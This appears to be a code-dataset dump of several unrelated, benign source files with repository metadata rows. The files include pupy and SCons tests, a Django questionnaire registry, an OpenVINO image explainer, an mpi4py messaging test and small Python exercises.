x.add_row([i, res[i]])
print(x)
def submissions(args):
w = get_worker()
table = w.get_last_submission()
x = from_html_one(table)
print(x[1:10])
def main():
"""Point of entry."""
parser = initialize_parser()
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
main()
| 23.2 | 104 | 0.671336 | 243 | 1,856 | 4.921811 | 0.320988 | 0.020067 | 0.062709 | 0.073579 | 0.147157 | 0.103679 | 0.058528 | 0.058528 | 0 | 0 | 0 | 0.002037 | 0.206358 | 1,856 | 79 | 105 | 23.493671 | 0.809912 | 0.022629 | 0 | 0.111111 | 0 | 0 | 0.123128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12963 | false | 0.037037 | 0.092593 | 0.018519 | 0.259259 | 0.092593 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10d929632dae7a58fe9ad2a5c602cd815300085f | 2,160 | py | Python | tests/test_linked_tmp_dir.py | jessekrubin/pup | 2cab5da7b1b39453c44be556b691db83442b0565 | [
"BSD-2-Clause"
] | 2 | 2019-03-07T09:26:36.000Z | 2019-07-31T17:24:23.000Z | tests/test_linked_tmp_dir.py | jessekrubin/pup | 2cab5da7b1b39453c44be556b691db83442b0565 | [
"BSD-2-Clause"
] | 2 | 2019-10-26T02:29:54.000Z | 2021-06-25T15:28:12.000Z | tests/test_linked_tmp_dir.py | jessekrubin/pup | 2cab5da7b1b39453c44be556b691db83442b0565 | [
"BSD-2-Clause"
] | 1 | 2019-07-31T17:24:32.000Z | 2019-07-31T17:24:32.000Z | # -*- coding: utf-8 -*-
import os
from os import chdir
from os import path
from os import sep
import pupy.utils
from pupy import dirs_gen
from pupy import files_gen
PWD = path.split(path.realpath(__file__))[0]
def test_mkdirs():
dirs = [("something",), ("something", "else")]
expected = [path.join(*route) for route in dirs]
with pupy.utils.linked_tmp_dir(dir=PWD, mkdirs=dirs) as tmpdir:
dirs = sorted(
dirpath
for dirpath in (
tmp_subdir.replace(tmpdir, "").strip(sep)
for tmp_subdir in dirs_gen(tmpdir)
)
if dirpath != ""
)
assert set(dirs) == set(expected)
assert all(not path.exists(d) for d in dirs)
def test_linkin():
tdata = [
["dummy_dir", "a_file.txt"],
["dummy_dir", "b_file.txt"],
["dummy_dir", "a_dir", "c_file.txt"],
["dummy_dir", "a_dir", "a_a_dir", "d_file.txt"],
["dummy_dir", "b_dir", "e_file.txt"],
["dummy_dir", "b_dir", "f_file.txt"],
]
chdir(PWD)
lnfiles = [(path.join(*route), path.join(PWD, *route)) for route in tdata]
print(lnfiles)
dirs = [path.join(PWD, *route[:-1]) for route in tdata]
for thingy in set(dirs):
os.makedirs(thingy, exist_ok=True)
print(dirs)
# for uno, dos in lnfiles:
# touch(uno)
tmp_dirpath = None
with pupy.utils.linked_tmp_dir(lnfiles=lnfiles) as tmpdir:
tmp_dirpath = tmpdir
linkedfiles = sorted(
dirpath
for dirpath in (
tmp_subdir.replace(tmpdir, "").strip(sep)
for tmp_subdir in files_gen(tmpdir)
)
if dirpath != ""
)
# print(list(files_gen(tmpdir)))
# print(tmpdir)
# print(os.listdir(tmpdir))
lnfiles_links = [link for link, target in lnfiles]
assert set(lnfiles_links) == set(linkedfiles)
assert not path.exists(tmp_dirpath)
for link, target in lnfiles:
assert path.exists(target)
# try:
# rmtree(path.join(PWD, 'dummy_dir'))
# except:
# pass
if __name__ == "__main__":
pass
| 27.341772 | 78 | 0.571296 | 281 | 2,160 | 4.206406 | 0.284698 | 0.047377 | 0.050761 | 0.063452 | 0.284264 | 0.270728 | 0.116751 | 0.116751 | 0.116751 | 0.116751 | 0 | 0.001972 | 0.295833 | 2,160 | 78 | 79 | 27.692308 | 0.775148 | 0.089815 | 0 | 0.142857 | 0 | 0 | 0.087468 | 0 | 0 | 0 | 0 | 0 | 0.089286 | 1 | 0.035714 | false | 0.017857 | 0.125 | 0 | 0.160714 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10db58e9449ec9ec50d75caab8c6a1198181a281 | 8,527 | py | Python | questionnaire_core/question_types/base.py | anfema/django-questionnaire-core | 82151cf14d00b5a83cb478cc07f9143fd57382c9 | [
"MIT"
] | null | null | null | questionnaire_core/question_types/base.py | anfema/django-questionnaire-core | 82151cf14d00b5a83cb478cc07f9143fd57382c9 | [
"MIT"
] | 2 | 2019-01-30T16:05:15.000Z | 2021-06-10T14:45:57.000Z | questionnaire_core/question_types/base.py | anfema/django-questionnaire-core | 82151cf14d00b5a83cb478cc07f9143fd57382c9 | [
"MIT"
] | 2 | 2019-01-17T12:09:47.000Z | 2019-01-30T15:59:01.000Z | import inspect
import string
from django import forms
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.template.engine import Engine
from django.template.exceptions import TemplateDoesNotExist
class QuestionTypeRegistry:
"""Registry for question type classes."""
_registered_types = {}
@classmethod
def register(cls, question_type):
name = question_type.meta.name
cls._registered_types[name] = question_type
@classmethod
def unregister(cls, question_type):
name = question_type.meta.name
if name in cls._registered_types:
del cls._registered_types[name]
@classmethod
def get_question_types(cls):
return cls._registered_types
@classmethod
def get_question_type(cls, name):
try:
return cls._registered_types[name]
except KeyError:
return
class Options:
"""Class to hold `meta` options of a question type class."""
REQUIRED = ('name', 'verbose_name')
NAME_VALID_CHARS = string.ascii_lowercase + string.digits + '_'
def __init__(self, cls, meta):
for required_option in self.REQUIRED:
if not meta.get(required_option, None):
raise AttributeError('{}.Meta missing required field "{}"'.format(cls.__name__, required_option))
if not set(self.NAME_VALID_CHARS).issuperset(set(meta.get('name'))):
raise ValueError(
'Invalid name for question type class {}: {} (valid chars: {})'.format(
cls.__name__,
meta.get('name'),
self.NAME_VALID_CHARS,
)
)
self.name = meta.get('name')
self.verbose_name = meta.get('verbose_name')
self.multiple = meta.get('multiple', False)
self.widget_class = meta.get('widget_class', None)
self._widget_template_name = meta.get('widget_template_name')
self._widget_option_template_name = meta.get('widget_option_template_name')
@property
def widget_template_name(self):
return self._widget_template_name or self.select_default_template('template_name')
@property
def widget_option_template_name(self):
return self._widget_option_template_name or self.select_default_template('option_template_name')
def select_default_template(self, template_key):
"""Select default template for the formfield widget.
Returns the packaged template for the widget if available.
"""
if template_key == 'template_name':
default_template = 'questionnaire_core/widgets/{name}.html'.format(name=self.name)
elif template_key == 'option_template_name':
default_template = 'questionnaire_core/widgets/{name}_option.html'.format(name=self.name)
else:
return
try:
template_engine = Engine.get_default()
packaged_template = template_engine.get_template(default_template)
return packaged_template.name
except TemplateDoesNotExist:
return
class QuestionTypeMeta(type):
"""Meta class for question type classes.
Responsible for registering question type classes with QuestionTypeRegistry
and setting up the `meta` attribute of question type classes.
"""
def __new__(mcs, name, bases, attrs):
super_new = super(QuestionTypeMeta, mcs).__new__
# register only subclasses of QuestionTypeBase not QuestionTypeBase itself
if name == 'QuestionTypeBase':
return super_new(mcs, name, bases, attrs)
attr_meta = attrs.pop('Meta', None)
# don't register abstract classes
if getattr(attr_meta, 'abstract', False):
return super_new(mcs, name, bases, attrs)
if not attr_meta or not inspect.isclass(attr_meta):
raise AttributeError('{}.Meta attribute missing or not a class'.format(name))
new_class = super_new(mcs, name, bases, attrs)
# create meta attribute (instance of Options) from new_class.Meta (similar to Model._meta)
setattr(new_class, 'meta', Options(new_class, attr_meta.__dict__))
QuestionTypeRegistry.register(new_class)
return new_class
class QuestionTypeBase(object, metaclass=QuestionTypeMeta):
"""Base class for question type classes"""
class OptionsForm(forms.Form):
pass
def __init__(self, question):
self.question = question
def question_option_form(self, *args, **kwargs): # arg0: request (optional)
return self.OptionsForm
@classmethod
def question_option_form_fields(cls):
return cls.OptionsForm.base_fields
def clean_question_options(self, question_options):
"""Clean question options (`Question.question_options`).
Override to implement any custom validations of the question options of the question type.
:param question_options: django admin form field data
:type question_options: dict
:return: cleaned form field data
:rtype: dict
:raises: django.forms.ValidationError: Validation error
"""
return question_options
def clean_answer_data(self, data):
"""Clean answer data (`QuestionAnswer.answer_data`).
:param data: data returned from the formfield
:return: cleaned formfield data
:raises: django.forms.ValidationError: Validation error
"""
return data
def formfield(self, result_set):
"""Form field for the question type.
:param result_set: result set of the current form
:type result_set: questionnaire_core.models.QuestionnaireResult
:return: django form field for the question type
:rtype: django.forms.Field
"""
raise NotImplementedError
def formfield_widget(self, **kwargs):
"""Setup and return the widget for the formfield."""
widget_attrs = self.formfield_widget_attrs()
if 'attrs' in kwargs:
widget_attrs.update(kwargs.get('attrs'))
kwargs['attrs'] = widget_attrs
widget = self.widget_class()(**kwargs)
# set template attribute(s) of the widget
for template_key in ('template_name', 'option_template_name'):
meta_template_key = 'widget_{}'.format(template_key)
if getattr(self.question.question_type_obj.meta, meta_template_key) and hasattr(widget, template_key):
setattr(widget, template_key, getattr(self.question.question_type_obj.meta, meta_template_key))
return widget
def widget_class(self):
"""Return the configured widget class for the formfield."""
if not self.meta.widget_class:
raise ValueError('{}.Meta.widget_class attribute is missing.'.format(self.__class__.__name__))
return self.meta.widget_class
def formfield_widget_attrs(self):
"""Setup and return the attributes for the formfield widget (based on question options)."""
attrs = dict()
if 'autocomplete' in self.question.question_options:
attrs.update({'autocomplete': 'on' if self.question.question_options.get('autocomplete') else 'off'})
return attrs
def initial_field_value(self, result_set):
"""Return the initial formfield value based on the supplied result set."""
if self.question.question_type_obj.meta.multiple:
return list(result_set.answers.filter(question=self.question).values_list('answer_data', flat=True))
else:
try:
answer = result_set.answers.get(question=self.question)
return answer.answer_data
except ObjectDoesNotExist:
return None
except MultipleObjectsReturned:
raise ValueError('Multiple answers found for QuestionType with multiple=False')
def save(self, result_set, answer_data):
from ..models import QuestionAnswer
if self.meta.multiple:
assert isinstance(answer_data, list)
for answer_data_part in answer_data:
QuestionAnswer.objects.create(
result_set=result_set,
question=self.question,
answer_data=answer_data_part,
)
else:
QuestionAnswer.objects.create(
result_set=result_set,
question=self.question,
answer_data=answer_data,
)
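# Illustrative sketch (not part of the original module): a concrete question
# type registers itself simply by subclassing QuestionTypeBase with a Meta
# class; the `required` attribute on the question model is an assumption.
#
#     class FreeTextQuestion(QuestionTypeBase):
#         class Meta:
#             name = 'free_text'
#             verbose_name = 'Free text'
#             widget_class = forms.TextInput
#
#         def formfield(self, result_set):
#             return forms.CharField(
#                 required=getattr(self.question, 'required', False),
#                 widget=self.formfield_widget(),
#                 initial=self.initial_field_value(result_set),
#             )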
| 37.399123 | 114 | 0.659669 | 965 | 8,527 | 5.603109 | 0.180311 | 0.042168 | 0.023303 | 0.017755 | 0.216386 | 0.163492 | 0.131311 | 0.085815 | 0.051045 | 0.051045 | 0 | 0.000158 | 0.255541 | 8,527 | 227 | 115 | 37.563877 | 0.851607 | 0.196083 | 0 | 0.181818 | 0 | 0 | 0.095791 | 0.016594 | 0 | 0 | 0 | 0 | 0.006993 | 1 | 0.13986 | false | 0.006993 | 0.048951 | 0.034965 | 0.391608 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10dd825e001aa7924f28c1740803cd3a8e44f8f0 | 320 | py | Python | pythonProject/desafio079.py | maisalobao/Python | 8b8fa9796853c8f094cb1602e7e45f57905a9057 | [
"MIT"
] | 1 | 2022-03-26T08:46:36.000Z | 2022-03-26T08:46:36.000Z | pythonProject/desafio079.py | maisalobao/Python | 8b8fa9796853c8f094cb1602e7e45f57905a9057 | [
"MIT"
] | null | null | null | pythonProject/desafio079.py | maisalobao/Python | 8b8fa9796853c8f094cb1602e7e45f57905a9057 | [
"MIT"
] | null | null | null | numeros = list()
while True:
    n = int(input('Enter a value: '))
if n not in numeros:
numeros.append(n)
else:
        print('Duplicate value!')
    escolha = str(input('Continue? [Y/N] ')).upper().strip()[0]
if escolha in 'N':
break
numeros.sort()
print(f'You entered {numeros}')
10ddae9de8ee7cd14d8dcf0dcc4990b53daa7cad | 3,228 | py | Python | wb/main/jobs/inference_test_image/test_image_classification_explainer.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 23 | 2022-03-17T12:24:09.000Z | 2022-03-31T09:13:30.000Z | wb/main/jobs/inference_test_image/test_image_classification_explainer.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 18 | 2022-03-21T08:17:44.000Z | 2022-03-30T12:42:30.000Z | wb/main/jobs/inference_test_image/test_image_classification_explainer.py | apaniukov/workbench | 2f2653ecfd0143d2d53e33ad84379f13443fdfaa | [
"Apache-2.0"
] | 16 | 2022-03-17T12:24:14.000Z | 2022-03-31T12:15:12.000Z | """
OpenVINO DL Workbench
Test image explainer
Copyright (c) 2021 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import base64
from typing import List, Callable, Tuple
import cv2
import numpy as np
from openvino.pyopenvino import Layout
from openvino.tools.accuracy_checker.evaluators import ModelEvaluator
from openvino.tools.accuracy_checker.representation import ClassificationPrediction
from wb.main.jobs.inference_test_image.accuracy_checker_representations_serializers import InferencePrediction
from wb.main.jobs.inference_test_image.rise import RISE
class TestImageClassificationExplainer:
def __init__(self, model_evaluator: ModelEvaluator):
self.model_evaluator = model_evaluator
first_input = list(model_evaluator.launcher.inputs.values())[0]
input_layout: Layout = first_input.layout
shape = first_input.shape
h_index = input_layout.get_index_by_name('H')
w_index = input_layout.get_index_by_name('W')
self.image_info_inputs = shape[h_index], shape[w_index]
self.rise = RISE(self.image_info_inputs)
def explain(self, image_path: str, progress_cb: Callable[[int], None] = None) -> List[InferencePrediction]:
test_image = cv2.imread(image_path)
result: ClassificationPrediction = self.model_evaluator.process_single_image(test_image)
top_k = min(5, len(result.scores))
top_k_labels = result.top_k(top_k)
explanations = self.rise.explain(lambda x: self.model_evaluator.process_single_image(x).scores,
cv2.resize(test_image, self.image_info_inputs),
progress_cb)
predictions: List[InferencePrediction] = []
for label_id in top_k_labels:
prediction = InferencePrediction()
prediction.category_id = int(label_id)
prediction.score = float(result.scores[label_id])
prediction.explanation_mask = self.to_base64_heat_mask(
explanations[label_id],
(test_image.shape[1], test_image.shape[0])
)
predictions.append(prediction)
return predictions
@classmethod
def to_base64_heat_mask(cls, explanation: np.array, size: Tuple[int, int]) -> str:
explanation_mask = cv2.resize(cls.to_heat_mask(explanation), size)
_, buffer = cv2.imencode('.jpg', explanation_mask)
return base64.b64encode(buffer).decode('utf-8')
@staticmethod
def to_heat_mask(mask: np.array) -> np.array:
heat_mask = cv2.normalize(mask, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX).astype(np.uint8)
return cv2.applyColorMap(heat_mask, cv2.COLORMAP_JET)
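# Illustrative usage sketch (not part of the original module); the
# `model_evaluator` below is assumed to be an already-configured
# accuracy-checker ModelEvaluator for a classification model.
#
#     explainer = TestImageClassificationExplainer(model_evaluator)
#     predictions = explainer.explain('/path/to/image.jpg',
#                                     progress_cb=lambda pct: print(pct))
#     for p in predictions:
#         print(p.category_id, p.score)  # p.explanation_mask is a base64 JPEG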
| 39.851852 | 111 | 0.711586 | 414 | 3,228 | 5.342995 | 0.422705 | 0.03255 | 0.03255 | 0.025769 | 0.117541 | 0.088608 | 0.056058 | 0 | 0 | 0 | 0 | 0.014453 | 0.206939 | 3,228 | 80 | 112 | 40.35 | 0.849609 | 0.187113 | 0 | 0 | 0 | 0 | 0.004224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.191489 | 0 | 0.361702 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e01d950f12c52f0048a5b825e752558dafbd51 | 2,540 | py | Python | test/ZIP/ZIPROOT.py | jcassagnol-public/scons | 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | [
"MIT"
] | 1,403 | 2017-11-23T14:24:01.000Z | 2022-03-30T20:59:39.000Z | test/ZIP/ZIPROOT.py | jcassagnol-public/scons | 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | [
"MIT"
] | 3,708 | 2017-11-27T13:47:12.000Z | 2022-03-29T17:21:17.000Z | test/ZIP/ZIPROOT.py | jcassagnol-public/scons | 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | [
"MIT"
] | 281 | 2017-12-01T23:48:38.000Z | 2022-03-31T15:25:44.000Z | #!/usr/bin/env python
#
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
import zipfile
test.subdir('sub1')
test.subdir(['sub1', 'sub2'])
test.write('SConstruct', """
env = Environment(tools = ['zip'])
env.Zip(target = 'aaa.zip', source = ['sub1/file1'], ZIPROOT='sub1')
env.Zip(target = 'bbb.zip', source = ['sub1/file2', 'sub1/sub2/file2'], ZIPROOT='sub1')
""" % locals())
test.write(['sub1', 'file1'], "file1\n")
test.write(['sub1', 'file2'], "file2a\n")
test.write(['sub1', 'sub2', 'file2'], "file2b\n")
test.run(arguments = 'aaa.zip', stderr = None)
test.must_exist('aaa.zip')
# TEST: Zip file should contain 'file1', not 'sub1/file1', because of ZIPROOT.
with zipfile.ZipFile('aaa.zip', 'r') as zf:
test.fail_test(zf.testzip() is not None)
files = test.zipfile_files('aaa.zip')
test.fail_test(test.zipfile_files('aaa.zip') != ['file1'],
message='Zip file aaa.zip has wrong files: %s' % repr(files))
###
test.run(arguments = 'bbb.zip', stderr = None)
test.must_exist('bbb.zip')
# TEST: Zip file should contain 'sub2/file2', not 'sub1/sub2/file2', because of ZIPROOT.
with zipfile.ZipFile('bbb.zip', 'r') as zf:
test.fail_test(zf.testzip() is not None)
files = test.zipfile_files('bbb.zip')
test.fail_test(test.zipfile_files('bbb.zip') != ['file2', 'sub2/file2'],
message='Zip file bbb.zip has wrong files: %s' % repr(files))
test.pass_test()
| 32.987013 | 88 | 0.709843 | 379 | 2,540 | 4.717678 | 0.37467 | 0.049217 | 0.026846 | 0.01566 | 0.241611 | 0.231544 | 0.134228 | 0.099553 | 0.065996 | 0.065996 | 0 | 0.015799 | 0.152756 | 2,540 | 76 | 89 | 33.421053 | 0.815056 | 0.491339 | 0 | 0.068966 | 0 | 0.068966 | 0.342835 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.034483 | 0.068966 | 0 | 0.068966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e0c703082609535db5fb8adcd5ad5028b03e45 | 1,943 | py | Python | tests/macro/scripts/MPI/np_point_to_point_3.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 206 | 2018-06-28T00:28:47.000Z | 2022-03-29T05:17:03.000Z | tests/macro/scripts/MPI/np_point_to_point_3.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 670 | 2018-07-23T11:02:24.000Z | 2022-03-30T07:28:05.000Z | tests/macro/scripts/MPI/np_point_to_point_3.py | dina-fouad/pyccel | f4d919e673b400442b9c7b81212b6fbef749c7b7 | [
"MIT"
] | 19 | 2019-09-19T06:01:00.000Z | 2022-03-29T05:17:06.000Z | # pylint: disable=missing-function-docstring, missing-module-docstring/
from mpi4py import MPI
from numpy import zeros
# we need to declare these variables somehow,
# since we are calling MPI subroutines
if __name__ == '__main__':
size = -1
rank = -1
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
nx = 4
ny = 3 * 2
x = zeros(nx)
y = zeros((3,2))
if rank == 0:
x[:] = 1.0
y[:,:] = 1.0
source = 0
dest = 1
# ...
tag1 = 1234
if rank == source:
comm.send(x,dest, tag=tag1)
print("> test 1: processor ", rank, " sent ", x)
if rank == dest:
x=comm.recv(source, tag1)
print("> test 1: processor ", rank, " got ", x)
# ...
# ...
tag2 = 5678
if rank == source:
x[:] = 0.0
x[1] = 2.0
comm.send(x[1],dest, tag2)
print("> test 2: processor ", rank, " sent ", x[1])
if rank == dest:
x[1]=comm.recv(source, tag2)
print("> test 2: processor ", rank, " got ", x[1])
# ...
# ...
tag3 = 4321
if rank == source:
comm.send(y,dest, tag3)
print("> test 3: processor ", rank, " sent ", y)
if rank == dest:
y=comm.recv(source, tag3)
print("> test 3: processor ", rank, " got ", y)
# ...
# ...
tag4 = 8765
if rank == source:
y[:,:] = 0.0
y[1,1] = 2.0
comm.send(y[1,1],dest, tag4)
print("> test 4: processor ", rank, " sent ", y[1,1])
if rank == dest:
y[1,1]=comm.recv(source, tag4)
print("> test 4: processor ", rank, " got ", y[1,1])
# ...
# ...
tag5 = 6587
if rank == source:
comm.send(y[1,:],dest, tag5)
print("> test 5: processor ", rank, " sent ", y[1,:])
if rank == dest:
y[1,:]=comm.recv(source, tag5)
print("> test 5: processor ", rank, " got ", y[1,:])
# ...
| 22.858824 | 71 | 0.478127 | 265 | 1,943 | 3.464151 | 0.230189 | 0.071895 | 0.065359 | 0.052288 | 0.436819 | 0.368192 | 0 | 0 | 0 | 0 | 0 | 0.067863 | 0.340196 | 1,943 | 84 | 72 | 23.130952 | 0.648206 | 0.097787 | 0 | 0.178571 | 0 | 0 | 0.154112 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.035714 | 0.178571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e1b2a4e8a21648b7214c1e5fa50745b33f9851 | 1,196 | py | Python | tests/unit/admin/views/test_core.py | matt-land/warehouse | 0acb5d94528099ed5356253457cf8dc0b4e50aad | [
"Apache-2.0"
] | 2 | 2015-11-08T12:57:16.000Z | 2020-11-19T09:43:14.000Z | tests/unit/admin/views/test_core.py | matt-land/warehouse | 0acb5d94528099ed5356253457cf8dc0b4e50aad | [
"Apache-2.0"
] | 11 | 2020-01-06T18:55:57.000Z | 2022-03-11T23:27:05.000Z | tests/unit/admin/views/test_core.py | matt-land/warehouse | 0acb5d94528099ed5356253457cf8dc0b4e50aad | [
"Apache-2.0"
] | 1 | 2019-08-26T06:52:55.000Z | 2019-08-26T06:52:55.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pretend
from warehouse.admin.views import core as views
class TestForbidden:
def test_calls_real(self, monkeypatch):
response = pretend.stub()
forbidden_view = pretend.call_recorder(lambda *a, **kw: response)
monkeypatch.setattr(views, "forbidden_view", forbidden_view)
exc = pretend.stub()
request = pretend.stub()
assert views.forbidden(exc, request) is response
assert forbidden_view.calls == [
pretend.call(exc, request, redirect_to="admin.login"),
]
class TestDashboard:
def test_dashboard(self):
assert views.dashboard(pretend.stub()) == {}
| 31.473684 | 74 | 0.710702 | 159 | 1,196 | 5.289308 | 0.566038 | 0.071344 | 0.030916 | 0.03805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004197 | 0.203177 | 1,196 | 37 | 75 | 32.324324 | 0.878279 | 0.432274 | 0 | 0 | 0 | 0 | 0.037481 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e2ea010aa21fce8b0f2bb0646438f5615e3cee | 637 | py | Python | swexpert/d2/sw_1966.py | ruslanlvivsky/python-algorithm | 2b49bed33cd0e95b8a1e758008191f4392b3f667 | [
"MIT"
] | 3 | 2021-07-18T14:40:24.000Z | 2021-08-14T18:08:13.000Z | swexpert/d2/sw_1966.py | jinsuSang/python-algorithm | 524849a0a7e71034d329fef63c4f384930334177 | [
"MIT"
] | null | null | null | swexpert/d2/sw_1966.py | jinsuSang/python-algorithm | 524849a0a7e71034d329fef63c4f384930334177 | [
"MIT"
] | null | null | null | test_cases = int(input().strip())
def bubble_sort(lst):
nums = lst[:]
swap = True
for i in range(len(nums) - 1, -1, -1):
if not swap:
break
swap = False
for j in range(i):
if nums[j] > nums[j + 1]:
nums[j], nums[j + 1] = nums[j + 1], nums[j]
swap = True
return nums
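# Illustrative micro-example (not part of the original solution):
#
#     bubble_sort([3, 1, 2])  # -> [1, 2, 3]; the input list is left unchanged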
for t in range(1, test_cases + 1):
n = int(input().strip())
nums = list(map(int, input().strip().split()))
sorted_nums = bubble_sort(nums)
result = ''
for num in sorted_nums:
result += str(num) + ' '
print('#{} {}'.format(t, result))
| 20.548387 | 59 | 0.488226 | 90 | 637 | 3.388889 | 0.388889 | 0.098361 | 0.127869 | 0.098361 | 0.108197 | 0.088525 | 0.088525 | 0 | 0 | 0 | 0 | 0.019185 | 0.345369 | 637 | 30 | 60 | 21.233333 | 0.71223 | 0 | 0 | 0.095238 | 0 | 0 | 0.010989 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0 | 0 | 0.095238 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10e63d47bda56a757ae0b4b4f62e29ce5cd1b921 | 1,166 | py | Python | server/setup.py | JayYip/bert-as-service | 65f7bc46467ab791f85539c5a931212cb5f1c419 | [
"MIT"
] | 1 | 2019-04-20T08:40:24.000Z | 2019-04-20T08:40:24.000Z | server/setup.py | JayYip/bert-multitask-service | 65f7bc46467ab791f85539c5a931212cb5f1c419 | [
"MIT"
] | null | null | null | server/setup.py | JayYip/bert-multitask-service | 65f7bc46467ab791f85539c5a931212cb5f1c419 | [
"MIT"
] | null | null | null | from os import path
import codecs
from setuptools import setup, find_packages
with codecs.open('README.md', 'r', 'utf8') as reader:
long_description = reader.read()
with codecs.open('requirements.txt', 'r', 'utf8') as reader:
install_requires = list(map(lambda x: x.strip(), reader.readlines()))
setup(
name='bert_multitask_server',
version='0.1.2',
description='A service to serve bert_multitask_learning models(server)',
url='https://github.com/JayYip/bert-multitask-service',
long_description=long_description,
long_description_content_type='text/markdown',
author='Jay Yip',
author_email='junpang.yip@gmail.com',
license='MIT',
packages=find_packages(),
zip_safe=False,
install_requires=install_requires,
classifiers=(
'Programming Language :: Python :: 3.6',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
),
scripts=[
